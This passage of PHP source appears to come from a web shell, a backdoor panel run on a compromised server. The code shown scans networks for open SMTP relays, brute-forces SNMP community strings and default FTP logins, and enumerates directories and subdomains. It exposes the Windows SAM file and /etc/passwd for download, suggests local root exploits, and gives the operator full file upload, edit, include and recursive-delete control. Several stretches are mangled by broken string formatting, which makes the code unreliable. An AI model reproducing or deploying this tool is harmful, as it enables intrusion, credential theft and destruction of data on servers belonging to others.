                    $users = array('adm', 'bin', 'daemon', 'ftp', 'guest', 'listen', 'lp', 'mysql', 'noaccess', 'nobody', 'nobody4', 'nuucp', 'operator', 'root', 'smmsp', 'smtp', 'sshd', 'sys', 'test', 'unknown', 'uucp', 'web', 'www');
                    $nuke = array('/', '/postnuke/', '/postnuke/html/', '/modules/', '/phpBB/', '/forum/');
                    $cgi = array('/cgi.cgi/', '/webcgi/', '/cgi-914/', '/cgi-915/', '/bin/', '/cgi/', '/mpcgi/', '/cgi-bin/', '/ows-bin/', '/cgi-sys/', '/cgi-local/', '/htbin/', '/cgibin/', '/cgis/', '/scripts/', '/cgi-win/', '/fcgi-bin/', '/cgi-exe/', '/cgi-home/', '/cgi-perl/');
                    foreach ($file as $v) {
                        $vuln = array();
                        $v = trim($v);
                        if (!$v || $v{0} == '#') continue;
                        $v = str_replace('","', '^', $v);
                        $v = str_replace('"', '', $v);
                        $vuln = explode('^', $v);
                        $page = $cqich = $nukech = $adminch = $userch = $vuln[1];
                        if (strstr($page, '@CGIDIRS')) foreach ($cgi as $cg) {
                            $cqich = str_replace('@CGIDIRS', $cg, $page);
                            $url = "http://$ip$cqich";
                            $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                            if ($res) {
                                $output = 1;
                                echo "$ip)" . $vuln[4] . " <a href='$url' target='_blank'>$url</a><br>";
                            }
                        } elseif (strstr($page, '@ADMINDIRS')) foreach ($admin as $cg) {
                            $adminch = str_replace('@ADMINDIRS', $cg, $page);
                            $url = "http://$ip$adminch";
                            $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                            if ($res) {
                                $output = 1;
                                echo "$ip)" . $vuln[4] . " <a href='$url' target='_blank'>$url</a><br>";
                            }
                        } elseif (strstr($page, '@USERS')) foreach ($users as $cg) {
                            $userch = str_replace('@USERS', $cg, $page);
                            $url = "http://$ip$userch";
                            $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                            if ($res) {
                                $output = 1;
                                echo "$ip)" . $vuln[4] . " <a href='$url' target='_blank'>$url</a><br>";
                            }
                        } elseif (strstr($page, '@NUKE')) foreach ($nuke as $cg) {
                            $nukech = str_replace('@NUKE', $cg, $page);
                            $url = "http://$ip$nukech";
                            $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                            if ($res) {
                                $output = 1;
                                echo "$ip)" . $vuln[4] . " <a href='$url' target='_blank'>$url</a><br>";
                            }
                        } else {
                            $url = "http://$ip$page";
                            $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                            if ($res) {
                                $output = 1;
                                echo "$ip)" . $vuln[4] . " <a href='$url' target='_blank'>$url</a><br>";
                            }
                        }
                    }
                }
            }
            if (!empty($_REQUEST['smtprelay'])) {
                if (checkthisporT($ip, 25, $timeout)) {
                    $res = '';
                    $res = checksmtP($ip, $timeout);
                    if ($res == 1) {
                        echo "$ip) SMTP relay found.<br>";
                        $output = 1;
                    }
                }
            }
            if (!empty($_REQUEST['snmpscanner'])) {
                if (checkthisporT($ip, 161, $timeout, 1)) {
                    $com = $_REQUEST['com'];
                    $coms = $res = '';
                    if (strstr($com, ',')) $c = explode(',', $com);
                    else $c[0] = $com;
                    foreach ($c as $v) {
                        $ret = snmpchecK($ip, $v, $timeout);
                        if ($ret) $coms.= " $v ";
                    }
                    if ($coms != '') {
                        echo "$ip) SNMP FOUND: $coms<br>";
                        $output = 1;
                    }
                }
            }
            if (!empty($_REQUEST['ftpscanner']) && function_exists('ftp_connect')) {
                if (checkthisporT($ip, 21, $timeout)) {
                    $usps = explode(',', $_REQUEST['userpass']);
                    foreach ($usps as $v) {
                        $user = substr($v, 0, strpos($v, ':'));
                        $pass = substr($v, strpos($v, ':') + 1);
                        if ($pass == '[BLANK]') $pass = '';
                        $ftp = ftp_connect($ip, 21, $timeout);
                        if ($ftp) {
                            if (ftp_login($ftp, $user, $pass)) {
                                $output = 1;
                                echo "$ip) FTP FOUND: ($user:$pass) System type: " . ftp_systype($ftp) . " (<b><a href='";
                                echo hlinK("seC=ftpc&workingdiR=" . getcwd() . "&hosT=$ip&useR=$user&pasS=$pass");
                                echo "' target='_blank'>Connect</a></b>)<br>";
                            }
                        }
                    }
                }
            }
            if ($output) echo '<hr size=1 noshade>';
        }
        $time = time() - $start;
        echo "Done! ($time seconds)</font>";
        if (!empty($buglist)) unlink($buglist);
    } elseif (!empty($_REQUEST['directoryscanner'])) {
        $dir = file($_REQUEST['dic']);
        $host = $_REQUEST['host'];
        $r = $_REQUEST['r1'];
        echo "<font color=blue><pre>Scanning started...
";
        for ($i = 0;$i < count($dir);$i++) {
            $d = trim($dir[$i]);
            if ($r) {
                $adr = "http://$host/$d/";
                if (check_urL($adr, 'GET', '302')) {
                    echo "Directory Found: <a href='$adr' target='_blank'>$adr</a>
";
                }
            } else {
                $adr = "$d.$host";
                $ip = gethostbyname($adr);
                if ($ip != $adr) {
                    echo "Subdomain Found: <a href='http://$adr' target='_blank'>$adr($ip)</a>
";
                }
            }
        }
        echo 'Done!</pre></font>';
    } else {
        $t = "<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='50%'><tr><form method='POST'";
        $chbox = (extension_loaded('sockets')) ? "<input type=checkbox style='border-width:1px;background-color:#808080;' name=tcp value=1 checked>TCP<input type=checkbox name=udp style='border-width:1px;background-color:#808080;' value=1 checked>UDP" : "<input type=hidden name=tcp value=1>";
        echo "<center>$t><td>Port scanner:</td></tr><td width='25%' bgcolor='#808080'>Target:</td><td bgcolor='#808080' width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor='#666666' width=25%>From:</td><td bgcolor='#666666' width=25%><input name=fromport type=text value='1' size=5></td></tr><tr><td bgcolor='#808080' width=25%>To:</td><td bgcolor='#808080' width=25%><input name=toport type=text value='1024' size=5></td></tr><tr><td width='25%' bgcolor='#666666'>Timeout:</td><td bgcolor='#666666'><input name=timeout type=text value='2' size=5></td><tr><td width='25%' bgcolor='#808080'>$chbox</td><td bgcolor='#808080' align='right'>$hcwd<input type=submit class=buttons name=portscanner value=Scan></form>$et$t><td>Discoverer:</td></tr><tr><td width='25%' bgcolor='#808080'>Host:</td><td bgcolor='#808080' width=80%><input name=host value='" . $_SERVER["HTTP_HOST"] . "' size=40></td><td bgcolor='#808080'></td></tr><tr><td width='25%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width=80%><input name=dic size=40></td><td bgcolor='#666666'></td></tr><tr><td width='25%' bgcolor='#808080'>Search for:</td><td bgcolor='#808080' width=40%><input type=radio value=1 checked name=r1>Directories<input type=radio name=r1 value=0>Subdomains</td><td bgcolor='#808080' align='right' width=40%><input type=submit class=buttons name=directoryscanner value=Scan></td></form></tr></table>";
        $host = substr($host, 0, strrpos($host, "."));
        echo "$t name=security><td>Security scanner:</td></tr><td width='25%' bgcolor='#808080'>From:</td><td bgcolor='#808080' width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style='border-width:1px;background-color:#808080;' name=nslookup checked>NS lookup</td></tr><tr><td bgcolor='#666666' width=25%>To:</td><td bgcolor='#666666' width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width='25%' bgcolor='#808080'>Timeout:</td><td bgcolor='#808080'><input name=timeout type=text value='2' size=5></td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ipscanner value=1 checked onClick='document.security.port.disabled = !document.security.port.disabled;' style='border-width:1px;background-color:#666666;'>Port scanner:</td><td bgcolor='#666666'><input name=port type=text value='21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=httpbanner value=1 checked style='border-width:1px;background-color:#808080;'>Get web banner</td><td bgcolor='#808080'><input type=checkbox name=httpscanner value=1 checked style='border-width:1px;background-color:#808080;'>Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style='border-width:1px;background-color:#808080;'>SMTP relay check</td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ftpscanner value=1 checked onClick='document.security.userpass.disabled = !document.security.userpass.disabled;' style='border-width:1px;background-color:#666666;'>FTP password:</td><td bgcolor='#666666'><input name=userpass type=text value='anonymous:[email protected],ftp:ftp,Administrator:[BLANK],guest:[BLANK]' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=snmpscanner value=1 onClick='document.security.com.disabled = !document.security.com.disabled;' checked style='border-width:1px;background-color:#808080;'>SNMP:</td><td bgcolor='#808080'><input name=com type=text value='public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,sun,agent,manager,ibm,hello,switch,solaris,OrigEquipMfr,default,world,tech,mngt,tivoli,openview,community,snmp,SNMP,none,snmpd,Secret C0de,netman,security,pass,passwd,root,access,rmon,rmon_admin,hp_admin,[email protected]!,router,agent_steal,freekevin,read,read-only,read-write,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,IBM,apc,TENmanUFactOryPOWER,proxy,core,CISCO,regional,1234,2read,4changes' size=60></td></tr><tr><td width='25%' bgcolor='#666666'></td><td bgcolor='#666666' align='right'><input type=submit class=buttons name=securityscanner value=Scan></form>$et";
    }
}
function sysinfO() {
    global $windows, $disablefunctions, $cwd, $safemode;
    $t8 = "<td width='25%' bgcolor='#808080'>";
    $t6 = "<td width='25%' bgcolor='#666666'>";
    $mil = "<a target='_blank' href='http://www.milw0rm.org/related.php?program=";
    $basedir = (ini_get('open_basedir') || strtoupper(ini_get('open_basedir')) == 'ON') ? 'ON' : 'OFF';
    if (!empty($_SERVER['PROCESSOR_IDENTIFIER'])) $CPU = $_SERVER['PROCESSOR_IDENTIFIER'];
    $osver = $tsize = $fsize = '';
    $ds = implode(' ', $disablefunctions);
    if ($windows) {
        $osver = ' (' . shelL('ver') . ')';
        $sysroot = shelL("echo %systemroot%");
        if (empty($sysroot)) $sysroot = $_SERVER['SystemRoot'];
        if (empty($sysroot)) $sysroot = getenv('windir');
        if (empty($sysroot)) $sysroot = 'Not Found';
        if (empty($CPU)) $CPU = shelL('echo %PROCESSOR_IDENTIFIER%');
        for ($i = 66;$i <= 90;$i++) {
            $drive = chr($i) . ':\';
if(is_dir($drive)){
$fsize+=disk_free_space($drive);
$tsize+=disk_total_space($drive);
}
}
}else{
$ap=shelL('whereisapache');
if(!$ap)$ap='Unknow';
$fsize=disk_free_space(' / ');
$tsize=disk_total_space(' / ');
}
$xpl=rootxpL();if(!$xpl)$xpl='Notfound . ';
$disksize='Usedspase:
                '.showsizE($tsize-$fsize).'Freespace:
                    '.showsizE($fsize).'Totalspace:
                        '.showsizE($tsize);
if(empty($CPU))$CPU='Unknow';
$os=php_uname();
$osn=php_uname('s');
if(!$windows){
$ker=php_uname('r');
$o=($osn=='Linux')?'Linux + Kernel':$osn;
$os=str_replace($osn,"${mil}$o' > $osn < / a > ",$os);
$os=str_replace($ker,"$ {
                            mil
                        }
                        Linux + Kernel'>$ker</a>",$os);
$inpa=':
                            ';
}else{
$sam=$sysroot."\system32\config\SAM";
$inpa=';
                            ';
$os=str_replace($osn,"${mil}MS+Windows' > $osn < / a > ",$os);
}
$cuser=get_current_user();
if(!$cuser)$cuser='Unknow';
$software=str_replace('Apache',"$ {
                                mil
                            }
                            Apache'>Apache</a>",$_SERVER['SERVER_SOFTWARE']);
echo "<table border=0 cellpadding=0 cellspacing=0 style='border - collapse:
                                collapse' bgcolor=' #333333' width='100%'><tr><td>Server information:</td></tr><tr>${t6}Server:</td><td bgcolor='#666666'>".$_SERVER['HTTP_HOST'];if(!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "</td></tr><tr>${t8}Operation system:</td><td bgcolor='#808080'>$os$osver</td></tr><tr>${t6}Web server application:</td><td bgcolor='#666666'>$software</td></tr><tr>${t8}CPU:</td><td bgcolor='#808080'>$CPU</td></tr>${t6}Disk status:</td><td bgcolor='#666666'>$disksize</td></tr><tr>${t8}User domain:</td><td bgcolor='#808080'>";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "</td></tr><tr>${t6}User name:</td><td bgcolor='#666666'>$cuser</td></tr>";
                                if ($windows) {
                                    echo "<tr>${t8}Windows directory:</td><td bgcolor='#808080'><a href='" . hlinK("seC=fm&workingdiR=$sysroot") . "'>$sysroot</a></td></tr><tr>${t6}Sam file:</td><td bgcolor='#666666'>";
                                    if (is_readable(($sam))) echo "<a href='" . hlinK("?workingdiR=$sysroot\system32\config&downloaD=sam") . "'>Readable</a>";
                                    else echo 'Not readable';
                                    echo '</td></tr>';
                                } else {
                                    echo "<tr>${t8}UID - GID:</td><td bgcolor='#808080'>" . getmyuid() . ' - ' . getmygid() . "</td></tr><tr>${t6}Recommended local root exploits:</td><td bgcolor='#666666'>$xpl</td></tr><tr>${t8}Passwd file:</td><td bgcolor='#808080'>";
                                    if (is_readable('/etc/passwd')) echo "<a href='" . hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd") . "'>Readable</a>";
                                    else echo 'Not readable';
                                    echo "</td></tr><tr>${t6}${mil}cpanel'>cPanel</a>:</td><td bgcolor='#666666'>";
                                    $cp = '/usr/local/cpanel/version';
                                    $cv = (file_exists($cp) && is_writable($cp)) ? trim(file_get_contents($cp)) : 'Unknow';
                                    echo "$cv (Log file: ";
                                    if (file_exists('/var/cpanel/accounting.log')) {
                                        if (is_readable('/var/cpanel/accounting.log')) echo "<a href='" . hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd") . "'>Readable</a>";
                                        else echo 'Not readable';
                                    } else echo 'Not found';
                                    echo ')</td></tr>';
                                }
                                echo "<tr>$t8${mil}PHP'>PHP</a> version:</td><td bgcolor='#808080'><a href='?=" . php_logo_guid() . "' target='_blank'>" . PHP_VERSION . "</a> (<a href='" . hlinK("seC=phpinfo&workingdiR=$cwd") . "'>more...</a>)</td></tr><tr>${t6}Zend version:</td><td bgcolor='#666666'>";
                                if (function_exists('zend_version')) echo "<a href='?=" . zend_logo_guid() . "' target='_blank'>" . zend_version() . '</a>';
                                else echo 'Not Found';
                                echo "</td><tr>${t8}Include path:</td><td bgcolor='#808080'>" . str_replace($inpa, ' ', DEFAULT_INCLUDE_PATH) . "</td><tr>${t6}PHP Modules:</td><td bgcolor='#666666'>";
                                $ext = get_loaded_extensions();
                                foreach ($ext as $v) {
                                    $i = phpversion($v);
                                    if (!empty($i)) $i = "($i)";
                                    $l = hlinK("exT=$v");
                                    echo "<a href='javascript:void(0)' onclick=\"window.open('$l','','width=300,height=200,scrollbars=yes')\">$v</a> $i ";
                                }
                                echo "</td><tr>${t8}Disabled functions:</td><td bgcolor='#808080'>";
                                if (!empty($ds)) echo "$ds ";
                                else echo 'Nothing';
                                echo "</td></tr><tr>${t6}Safe mode:</td><td bgcolor='#666666'>$safemode</td></tr><tr>${t8}Open base dir:</td><td bgcolor='#808080'>$basedir</td></tr><tr>${t6}DBMS:</td><td bgcolor='#666666'>";
                                $sq = '';
                                if (function_exists('mysql_connect')) $sq = "${mil}MySQL'>MySQL</a> ";
                                if (function_exists('mssql_connect')) $sq.= " ${mil}MSSQL'>MSSQL</a> ";
                                if (function_exists('ora_logon')) $sq.= " ${mil}Oracle'>Oracle</a> ";
                                if (function_exists('sqlite_open')) $sq.= ' SQLite ';
                                if (function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL'>PostgreSQL</a> ";
                                if (function_exists('msql_connect')) $sq.= ' mSQL ';
                                if (function_exists('mysqli_connect')) $sq.= ' MySQLi ';
                                if (function_exists('ovrimos_connect')) $sq.= ' Ovrimos SQL ';
                                if ($sq == '') $sq = 'Nothing';
                                echo "$sq</td></tr></table>";
                            }
                            function checksuM($file) {
                                global $et;
                                echo "<table border=0 style='border-collapse: collapse' width='100%'><tr><td width='10%' bgcolor='#666666'><b>MD5:</b> <font color=#F0F0F0>" . md5_file($file) . '</font><br><b>SHA1:</b><font color=#F0F0F0>' . sha1_file($file) . "</font>$et";
                            }
                            function listdiR($cwd, $task) {
                                $c = getcwd();
                                $dh = opendir($cwd);
                                while ($cont = readdir($dh)) {
                                    if ($cont == '.' || $cont == '..') continue;
                                    $adr = $cwd . DIRECTORY_SEPARATOR . $cont;
                                    switch ($task) {
                                        case '0':
                                            if (is_file($adr)) echo "[<a href='" . hlinK("seC=edit&filE=$adr&workingdiR=$c") . "'>$adr</a>]
";
                                            if (is_dir($adr)) echo "[<a href='" . hlinK("seC=fm&workingdiR=$adr") . "'>$adr</a>]
";
                                            break;
                                        case '1':
                                            if (is_writeable($adr)) {
                                                if (is_file($adr)) echo "[<a href='" . hlinK("seC=edit&filE=$adr&workingdiR=$c") . "'>$adr</a>]
";
                                                if (is_dir($adr)) echo "[<a href='" . hlinK("seC=fm&workingdiR=$adr") . "'>$adr</a>]
";
                                            }
                                            break;
                                        case '2':
                                            if (is_file($adr) && is_writeable($adr)) echo "[<a href='" . hlinK("seC=edit&filE=$adr&workingdiR=$c") . "'>$adr</a>]
";
                                            break;
                                        case '3':
                                            if (is_dir($adr) && is_writeable($adr)) echo "[<a href='" . hlinK("seC=fm&workingdiR=$adr") . "'>$adr</a>]
";
                                            break;
                                        case '4':
                                            if (is_file($adr)) echo "[<a href='" . hlinK("seC=edit&filE=$adr&workingdiR=$c") . "'>$adr</a>]
";
                                            break;
                                        case '5':
                                            if (is_dir($adr)) echo "[<a href='" . hlinK("seC=fm&workingdiR=$adr") . "'>$adr</a>]
";
                                            break;
                                        case '6':
                                            if (preg_match('@' . $_REQUEST['search'] . '@', $cont) || (is_file($adr) && preg_match('@' . $_REQUEST['search'] . '@', file_get_contents($adr)))) {
                                                if (is_file($adr)) echo "[<a href='" . hlinK("seC=edit&filE=$adr&workingdiR=$c") . "'>$adr</a>]
";
                                                if (is_dir($adr)) echo "[<a href='" . hlinK("seC=fm&workingdiR=$adr") . "'>$adr</a>]
";
                                            }
                                            break;
                                        case '7':
                                            if (strstr($cont, $_REQUEST['search']) || (is_file($adr) && strstr(file_get_contents($adr), $_REQUEST['search']))) {
                                                if (is_file($adr)) echo "[<a href='" . hlinK("seC=edit&filE=$adr&workingdiR=$c") . "'>$adr</a>]
";
                                                if (is_dir($adr)) echo "[<a href='" . hlinK("seC=fm&workingdiR=$adr") . "'>$adr</a>]
";
                                            }
                                            break;
                                        case '8': {
                                                if (is_dir($adr)) rmdir($adr);
                                                else unlink($adr);
                                                rmdir($cwd);
                                                break;
                                            }
                                        }
                                        if (is_dir($adr)) listdiR($adr, $task);
                                    }
                                }
                                if (!checkfunctioN('posix_getpwuid')) {
                                    function posix_getpwuid($u) {
                                        return 0;
                                    }
                                }
                                if (!checkfunctioN('posix_getgrgid')) {
                                    function posix_getgrgid($g) {
                                        return 0;
                                    }
                                }
                                function filemanageR() {
                                    global $windows, $msgbox, $errorbox, $t, $et, $cwd, $hcwd;
                                    $table = "<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'>";
                                    $td1n = "<td width='22%' bgcolor='#666666'>";
                                    $td2m = "<td width='22%' bgcolor='#808080'>";
                                    $td1i = "<td width='5%' bgcolor='#666666'>";
                                    $td2i = "<td width='5%' bgcolor='#808080'>";
                                    $tdnr = "<td width='22%' bgcolor='#800000'>";
                                    $tdw = "<td width='22%' bgcolor='#006E00'>";
                                    if (!empty($_REQUEST['task'])) {
                                        if (!empty($_REQUEST['search'])) $_REQUEST['task'] = 7;
                                        if (!empty($_REQUEST['re'])) $_REQUEST['task'] = 6;
                                        echo '<font color=blue><pre>';
                                        listdiR($cwd, $_REQUEST['task']);
                                        echo '</pre></font>';
                                    } else {
                                        if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV']) || !empty($_REQUEST['rN'])) {
                                            if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])) {
                                                $title = 'Destination';
                                                $ad = (!empty($_REQUEST['cP'])) ? $_REQUEST['cP'] : $_REQUEST['mV'];
                                                $dis = (!empty($_REQUEST['cP'])) ? 'Copy' : 'Move';
                                            } else {
                                                $ad = $_REQUEST['rN'];
                                                $title = 'New name';
                                                $dis = 'Rename';
                                            }
                                            if (!!empty($_REQUEST['deS'])) {
                                                echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='100%' bgcolor='#333333'>$title:</td></tr><tr>$td1n<form method='POST'><input type=text value='";
                                                if (empty($_REQUEST['rN'])) echo $cwd;
                                                echo "' size=60 name=deS></td></tr><tr>$td2m$hcwd<input type=hidden value='" . htmlspecialchars($ad) . "' name=cp><input class=buttons type=submit value=$dis></form>$et</center>";
                                            } else {
                                                if (!empty($_REQUEST['rN'])) rename($ad, $_REQUEST['deS']);
                                                else {
                                                    copy($ad, $_REQUEST['deS']);
                                                    if (!empty($_REQUEST['mV'])) unlink($ad);
                                                }
                                            }
                                        }
                                        if (!empty($_REQUEST['deL'])) {
                                            if (is_dir($_REQUEST['deL'])) listdiR($_REQUEST['deL'], 8);
                                            else unlink($_REQUEST['deL']);
                                        }
                                        if (!empty($_FILES['uploadfile'])) {
                                            move_uploaded_file($_FILES['uploadfile']['tmp_name'], $_FILES['uploadfile']['name']);
                                            echo "$msgbox<b>Uploaded!</b> File name: " . $_FILES['uploadfile']['name'] . " File size: " . $_FILES['uploadfile']['size'] . "$et<br>";
                                        }
                                        $select = "<select onChange='document.location=this.options[this.selectedIndex].value;'><option value='" . hlinK("seC=fm&workingdiR=$cwd") . "'>--------</option><option value='";
                                        if (!empty($_REQUEST['newf'])) {
                                            if (!empty($_REQUEST['newfile'])) {
                                                file_put_contents($_REQUEST['newf'], '');
                                            }
                                            if (!empty($_REQUEST['newdir'])) {
                                                mkdir($_REQUEST['newf']);
                                            }
                                        }
                                        if ($windows) {
                                            echo "$table<td><b>Drives:</b> ";
                                            for ($i = 66;$i <= 90;$i++) {
                                                $drive = chr($i) . ':';
                                                if (is_dir($drive . "\")){$vol = shelL("vol $drive");
                                                if (empty($vol)) $vol = $drive;
                                                echo " <a title='$vol' href=" . hlinK("seC=fm&workingdiR=$drive\")." > $drive\ < / a > ";}
}
echo $et;
}
echo "$table < formmethod = 'POST' > < tr > < tdwidth = '20%' > < b > [ < aid = 'lk'style = 'text-decoration:none'href = '#'onClick = \"HS('div');\">-</a> ] Location:</b><input type=text name=workingdiR size=135 value='$cwd'><input class=buttons type=submit value=Change></form>$et";
                                                $file = $dir = $link = array();
                                                if ($dirhandle = opendir($cwd)) {while ($cont = readdir($dirhandle)) {if (is_dir($cwd . DIRECTORY_SEPARATOR . $cont)) $dir[] = $cont;
                                                elseif (is_file($cwd . DIRECTORY_SEPARATOR . $cont)) $file[] = $cont;
                                                else $link[] = $cont;
                                                }closedir($dirhandle);
                                                sort($file);
                                                sort($dir);
                                                sort($link);
                                                echo "<div id='div'><table border=1 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bordercolor='#282828' bgcolor='#333333' width='100%'><tr><td width='30%' bgcolor='#333333' align='center'>Name</td><td width='13%' bgcolor='#333333' align='center'>Owner</td><td width='12%' bgcolor='#333333' align='center'>Modification time</td><td width='12%' bgcolor='#333333' align='center'>Last change</td><td width='5%' bgcolor='#333333' align='center'>Info</td><td width='7%' bgcolor='#333333' align='center'>Size</td><td width='15%' bgcolor='#333333' align='center'>Actions</td></tr>";
                                                $i = 0;
                                                foreach ($dir as $dn) {echo '<tr>';
                                                $i++;
                                                $own = 'Unknow';
                                                $owner = posix_getpwuid(fileowner($dn));
                                                $mdate = date('Y/m/d H:i:s', filemtime($dn));
                                                $adate = date('Y/m/d H:i:s', fileatime($dn));
                                                $diraction = $select . hlinK('seC=fm&workingdiR=' . realpath($dn)) . "'>Open</option><option value='" . hlinK("seC=fm&workingdiR=$cwd&rN=$dn") . "'>Rename</option><option value='" . hlinK("seC=fm&deL=$dn&workingdiR=$cwd") . "'>Remove</option></select></td>";
                                                if ($owner) $own = "<a title=' Shell: " . $owner['shell'] . "' href='" . hlinK('seC=fm&workingdiR=' . $owner['dir']) . "'>" . $owner['name'] . '</a>';
                                                if (($i % 2) == 0) {$cl1 = $td1i;
                                                $cl2 = $td1n;
                                                } else {$cl1 = $td2i;
                                                $cl2 = $td2m;
                                                }if (is_writeable($dn)) echo $tdw;
                                                elseif (!is_readable($dn)) echo $tdnr;
                                                else echo $cl2;
                                                echo "<a href='" . hlinK('seC=fm&workingdiR=' . realpath($dn)) . "'>";
                                                if (strlen($dn) > 45) echo substr($dn, 0, 42) . '...';
                                                else echo $dn;
                                                echo '</a>';
                                                echo $cl1 . "$own</td>";
                                                echo $cl1 . "$mdate</td>";
                                                echo $cl1 . "$adate</td>";
                                                echo "</td>$cl1";
                                                echo "<a href='#' onClick=\"javascript:chmoD('$dn')\" title='Change mode'>";
                                                echo 'D';
                                                if (is_readable($dn)) echo 'R';
                                                if (is_writeable($dn)) echo 'W';
                                                echo '</a></td>';
                                                echo "$cl1------</td>";
                                                echo $cl2 . $diraction;
                                                echo '</tr>';
                                                }foreach ($file as $fn) {echo '<tr>';
                                                $i++;
                                                $own = 'Unknow';
                                                $owner = posix_getpwuid(fileowner($fn));
                                                $fileaction = $select . hlinK("seC=openit&namE=$fn&workingdiR=$cwd") . "'>Open</option><option value='" . hlinK("seC=edit&filE=$fn&workingdiR=$cwd") . "'>Edit</option><option value='" . hlinK("seC=fm&downloaD=$fn&workingdiR=$cwd") . "'>Download</option><option value='" . hlinK("seC=hex&filE=$fn&workingdiR=$cwd") . "'>Hex view</option><option value='" . hlinK("seC=img&filE=$fn&workingdiR=$cwd") . "'>Image</option><option value='" . hlinK("seC=inc&filE=$fn&workingdiR=$cwd") . "'>Include</option><option value='" . hlinK("seC=checksum&filE=$fn&workingdiR=$cwd") . "'>Checksum</option><option value='" . hlinK("seC=fm&workingdiR=$cwd&cP=$fn") . "'>Copy</option><option value='" . hlinK("seC=fm&workingdiR=$cwd&mV=$fn") . "'>Move</option><option value='" . hlinK("seC=fm&deL=$fn&workingdiR=$cwd") . "'>Remove</option></select></td>";
                                                $mdate = date('Y/m/d H:i:s', filemtime($fn));
                                                $adate = date('Y/m/d H:i:s', fileatime($fn));
                                                if ($owner) $own = "<a title='Shell:" . $owner['shell'] . "' href='" . hlinK('seC=fm&workingdiR=' . $owner['dir']) . "'>" . $owner['name'] . '</a>';
                                                $size = showsizE(filesize($fn));
                                                if (($i % 2) == 0) {$cl1 = $td1i;
                                                $cl2 = $td1n;
                                                } else {$cl1 = $td2i;
                                                $cl2 = $td2m;
                                                }if (is_writeable($fn)) echo $tdw;
                                                elseif (!is_readable($fn)) echo $tdnr;
                                                else echo $cl2;
                                                echo "<a href='" . hlinK("seC=openit&namE=$fn&workingdiR=$cwd") . "'>";
                                                if (strlen($fn) > 45) echo substr($fn, 0, 42) . '...';
                                                else echo $fn;
                                                echo '</a>';
                                                echo $cl1 . "$own</td>";
                                                echo $cl1 . "$mdate</td>";
                                                echo $cl1 . "$adate</td>";
                                                echo "</td>$cl1";
                                                echo "<a href='#' onClick=\"javascript:chmoD('$fn')\" title='Change mode'>";
                                                if (is_readable($fn)) echo "R";
                                                if (is_writeable($fn)) echo "W";
                                                if (is_executable($fn)) echo "X";
                                                if (is_uploaded_file($fn)) echo "U";
                                                echo "</a></td>";
                                                echo "$cl1$size</td>";
                                                echo $cl2 . $fileaction;
                                                echo '</tr>';
                                                }foreach ($link as $ln) {$own = 'Unknow';
                                                $i++;
                                                $owner = posix_getpwuid(fileowner($ln));
                                                $linkaction = $select . hlinK("seC=openit&namE=$ln&workingdiR=$ln") . "'>Open</option><option value='" . hlinK("seC=edit&filE=$ln&workingdiR=$cwd") . "'>Edit</option><option value='" . hlinK("seC=fm&downloaD=$ln&workingdiR=$cwd") . "'>Download</option><option value='" . hlinK("seC=hex&filE=$ln&workingdiR=$cwd") . "'>Hex view</option><option value='" . hlinK("seC=img&filE=$ln&workingdiR=$cwd") . "'>Image</option><option value='" . hlinK("seC=inc&filE=$ln&workingdiR=$cwd") . "'>Include</option><option value='" . hlinK("seC=checksum&filE=$ln&workingdiR=$cwd") . "'>Checksum</option><option value='" . hlinK("seC=fm&workingdiR=$cwd&cP=$ln") . "'>Copy</option><option value='" . hlinK("seC=fm&workingdiR=$cwd&mV=$ln") . "'>Move</option><option value='" . hlinK("seC=fm&workingdiR=$cwd&rN=$ln") . "'>Rename</option><option value='" . hlinK("seC=fm&deL=$ln&workingdiR=$cwd") . "'>Remove</option></select></td>";
                                                $mdate = date('Y/m/d H:i:s', filemtime($ln));
                                                $adate = date('Y/m/d H:i:s', fileatime($ln));
                                                if ($owner) $own = "<a title='Shell: " . $owner['shell'] . "' href='" . hlinK('seC=fm&workingdiR=' . $owner['dir']) . "'>" . $owner['name'] . '</a>';
                                                echo '<tr>';
                                                $size = showsizE(filesize($ln));
                                                if (($i % 2) == 0) {$cl1 = $td1i;
                                                $cl2 = $td1n;
                                                } else {$cl1 = $td2i;
                                                $cl2 = $td2m;
                                                }if (is_writeable($ln)) echo $tdw;
                                                elseif (!is_readable($ln)) echo $tdnr;
                                                else echo $cl2;
                                                echo "<a href='" . hlinK("seC=openit&namE=$ln&workingdiR=$cwd") . "'>";
                                                if (strlen($ln) > 45) echo substr($ln, 0, 42) . '...';
                                                else echo $ln;
                                                echo '</a>';
                                                echo $cl1 . "$own</td>";
                                                echo $cl1 . "$mdate</td>";
                                                echo $cl1 . "$adate</td>";
                                                echo "</td>${cl1
                                            }
                                            ";
                                            echo "<a href='#' onClick=\"javascript:chmoD('$ln')\" title='Change mode'>L";
                                            if (is_readable($ln)) echo "R";
